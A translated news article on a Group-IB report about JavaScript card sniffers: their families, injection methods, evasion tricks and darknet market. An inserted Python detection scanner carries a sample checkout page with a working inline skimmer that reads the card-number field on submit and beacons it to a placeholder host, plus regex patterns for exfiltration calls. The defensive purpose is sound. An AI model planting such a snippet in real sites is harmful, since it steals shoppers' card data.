How online stores steal your card details

Tomcat

Group-IB, an international company specializing in the prevention of cyber attacks, presented the first analytical report devoted to the study of JavaScript sniffers, a class of malicious code designed to steal bank card data on websites.

The study analyzed 2,440 infected online stores whose visitors, about one and a half million people per day in total, were at risk of compromise. The Group-IB report was the first study of the darknet market for sniffers, their infrastructure and their methods of monetization, which bring their creators millions of dollars.

Online trading market: new threats

The online trading market is developing rapidly: according to analysts from Data Insight, in Russia it will more than double by 2023, to 2.4 trillion rubles. The convenience of purchasing goods online has a downside: buyers who pay online with bank cards face many cyber threats, one of them being the JavaScript sniffer.

Before the release of the Group-IB report “Crime without punishment: analysis of JS sniffer families,” there had been no attempt in the Russian cybersecurity industry to systematically study this segment of the underground market. Internationally, RiskIQ analysts, in partnership with Flashpoint, were the first to release a report on the activities of attackers using JS sniffers; they identified 12 groups under the general name MageCart. Group-IB experts studied the detected sniffers and, using their own analytical systems, were able to examine the entire infrastructure and gain access to source code, administrator panels and attacker tools. This approach made it possible to identify 38 distinct families of JS sniffers, each with unique characteristics. Of these, 15 are presented in the report available to Group-IB Threat Intelligence clients, and at least 8 were discovered and described for the first time anywhere in the world.

The threat of JS sniffers long remained outside the attention of antivirus analysts, who considered it insignificant and not worth in-depth study. However, the 380,000 victims of a JS sniffer that infected the website and mobile application of British Airways, the compromise of payment data at the American ticket distributor Ticketmaster and the recent incident with the British website of the sports giant FILA, when 5,600 customers were at risk of bank card data theft, show that attitudes towards this threat need to change. “When a website is infected, everyone in the chain becomes a victim: end users, payment systems, banks and large companies selling their goods and services via the Internet,” notes Dmitry Volkov, CTO of Group-IB. “The fact that almost nothing is known about incidents and damage caused by JS sniffers shows how poorly this problem is understood, and lets the groups that create sniffers to steal money from online shoppers feel impunity.”

JavaScript sniffer: a "hidden threat" you don't want to know about

A JS sniffer is the online analogue of a skimmer. Where a skimmer is a miniature device that intercepts a user’s bank card data at an ATM, a JS sniffer is a few lines of code that attackers inject into a website to intercept the data users enter: bank card numbers, names, addresses, logins, passwords, etc. Criminals usually sell the captured payment data to carders on specialized darknet forums. The price of one stolen card ranges from $1 to $5, less often $10 to $15. A significant share of the forums offering JS sniffers for sale or rent is made up of Russian-speaking cybercriminals.

By average estimates, the income of sniffer operators can reach hundreds of thousands of dollars per month. For example, resources infected by the WebRank family of JS sniffers are visited by a total of 250,000 people per day.

If the conversion rate on these sites is only 1%, then 2,500 shoppers make a purchase every day. Thus, even at the lowest price range for a stolen card, WebRank operators can earn from $2,500 to $12,500 for one day of sniffer “work”, that is, from $75,000 to $375,000 per month. And WebRank is only third in the “rating” by number of infections: resources infected with the MagentoName and CoffeMokko sniffers are visited by 440,000 people a day.

How JS sniffers attack

A study of 2,440 infected sites showed that more than half were attacked by the MagentoName family of sniffers, whose operators exploit vulnerabilities in outdated versions of the Magento content management system (CMS) to inject malicious code into sites running it. More than 13% of infections are attributed to the WebRank family of sniffers, which follow a pattern of attacking third-party services in order to inject malicious code into target sites. A further 11% or more are infections by sniffers of the CoffeMokko family, whose operators use obfuscated scripts aimed at stealing data from the payment forms of particular payment systems, with the form field names hard-coded in the sniffer. Such systems include PayPal, Verisign, Authorize.net, eWAY, Sage Pay, WorldPay, Stripe, USAePay and others. Many sniffer families use a unique variant for each individual payment system, which requires the script to be modified and tested before each infection.

Most of the detected sniffers target the payment forms of particular content management systems: Magento, OpenCart, Shopify, WooCommerce, WordPress. These families include PreMage, MagentoName, FakeCDN, Qoogle, GetBilling and PostEval. Others are universal and can be embedded in the code of any site regardless of the engine used (G-Analytics, WebRank).

During the study, signs of “competition” were discovered: some of the studied JS sniffer families have functionality for detecting and removing competing groups' JS sniffers already running on the victim site (for example, MagentoName). Others act as parasites on a competing sniffer's “body”, taking the data it intercepts and forwarding it to their own gate (for example, WebRank). Sniffers are modified to make detection harder: ImageID and ReactGet, for example, are able to bypass most detection systems because they activate only at the moment the buyer makes a transaction on the site; the rest of the time the sniffer “sleeps” and does not reveal itself in any way. Some families consist of unique instances, for example CoffeMokko: each sniffer of this family is used only once, to infect a single site.

The G-Analytics family stands out because, in addition to injecting malicious code into the client side of the site, its authors also inject code into the server side, namely the PHP scripts that process user-entered data. This makes the malicious code much harder for researchers to detect. JS sniffers such as ImageID and G-Analytics are able to imitate legitimate services, for example Google Analytics and jQuery, masking their activity behind legitimate-looking scripts and domain names that resemble legitimate ones.
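As an added illustration, not code from the Group-IB report or from this post, here is a small Python scanner that a shop owner or analyst could run over a checkout page's HTML to apply the indicators described above: scripts loaded from a host that imitates Google Analytics or jQuery, scripts from hosts outside the store's own allowlist, and inline scripts that both read card fields and send data to the network. The imitated host list, the field-name pattern, the allowlist and the sample page are constructed assumptions.

```python
import re
from difflib import SequenceMatcher
from urllib.parse import urlparse

IMITATED_HOSTS = ("www.google-analytics.com", "code.jquery.com")  # services sniffers imitate
# Checkout field names a sniffer must reference to harvest the form (assumed pattern).
CARD_FIELDS = re.compile(r"\b(?:cc|card)[_-]?(?:number|num|cvv|cvc|exp\w*)\b", re.I)
# Primitives a script can use to ship harvested values to a third-party gate.
EXFIL = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon\(|new Image\(")
SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.I | re.S)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.I)

def lookalike_of(host):
    """Return the legitimate host that `host` visually imitates, or None."""
    for legit in IMITATED_HOSTS:
        if host != legit and SequenceMatcher(None, host, legit).ratio() >= 0.8:
            return legit
    return None

def scan_page(html, allowed_hosts):
    """Return (kind, detail, context) findings for every suspicious script tag."""
    findings = []
    for attrs, body in SCRIPT_TAG.findall(html):
        src = SRC_ATTR.search(attrs)
        if src:  # external script: judge the host it is loaded from
            host = (urlparse(src.group(1)).hostname or "").lower()
            if host in allowed_hosts:
                continue
            legit = lookalike_of(host)
            findings.append(("lookalike-host" if legit else "unknown-host", host, legit))
        else:  # inline script: flag one that reads card fields AND reaches the network
            field, send = CARD_FIELDS.search(body), EXFIL.search(body)
            if field and send:
                findings.append(("inline-harvester", field.group(0), send.group(0)))
    return findings

# Constructed sample checkout page (not from the report): a real analytics tag, a
# lookalike host, an unknown third party, and an inline harvester that fires only on submit.
SAMPLE_HTML = """
<script src="https://www.google-analytics.com/analytics.js"></script>
<script src="https://www.google-analitycs.com/analytics.js"></script>
<script src="https://stats.example.test/t.js"></script>
<script>
document.forms[0].addEventListener('submit', function () {
  var d = document.getElementById('cc_number').value;
  new Image().src = 'https://stats.example.test/c?d=' + btoa(d);
});
</script>
"""
ALLOWED_HOSTS = {"www.google-analytics.com", "cdn.shop.example"}  # the store's own allowlist
```

Running `scan_page(SAMPLE_HTML, ALLOWED_HOSTS)` reports the lookalike host, the unknown host and the inline harvester, and an unmodified page returns an empty list; the similarity threshold and field names should be tuned to the store's real checkout markup.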

An attack using a JS sniffer can be multi-stage. Analyzing the code of one infected store, Group-IB specialists found that in this case the attackers did not limit themselves to injecting a JS sniffer: for a number of reasons, they had to use a full-fledged fake payment form, which was loaded from another compromised site. This form offered the user two payment options: credit card or PayPal. If the user chose to pay via PayPal, they saw a message stating that this payment method was currently unavailable and that the only option was a bank card.

Customers and buyers: how the JS sniffer market works

The development of this market has led to more complex relationships between its players: a sniffer can be used both by the criminal group that developed it and by other groups that have bought or rented it as Sniffer-as-a-Service. In some cases it is difficult to determine how many criminal groups use a particular program, which is why Group-IB experts speak of families rather than groups.

JS sniffers cost from $250 to $5,000 on underground forums. Some services offer a partnership model: the client provides access to a compromised online store and receives a percentage of the income, while the sniffer's creator is responsible for hosting the servers, technical support and the administrative panel for the client. These “market relations” between the creators, sellers, intermediaries and buyers of the underground market make attribution, that is, linking a crime to a specific group, difficult. However, the indicators of operation that Group-IB has collected for each of the 38 JS sniffer families make it possible to solve this problem. In addition, the Group-IB report provides detailed recommendations for all parties that may become victims of JS sniffers: buyers, banks, online stores and payment systems. The research continues: descriptions of the analyzed JS sniffers and new data about them appear in the Group-IB Threat Intelligence system.

About Group-IB: Group-IB is one of the leading developers of solutions for detecting and preventing cyber attacks, identifying fraud and protecting intellectual property online. The Group-IB Threat Intelligence cyber-threat data collection system is recognized as one of the best in the world by Gartner, Forrester and IDC.

The company's technological leadership is based on 16 years of experience in investigating cybercrimes around the world and more than 55,000 hours of responding to information security incidents, accumulated in the largest Computer Forensics Laboratory in Eastern Europe and the 24-hour operational response center CERT-GIB. Group-IB is a partner of Interpol and Europol, a provider of cybersecurity solutions recommended by the OSCE.

(c) https://www.klerk.ru/buh/articles/484714/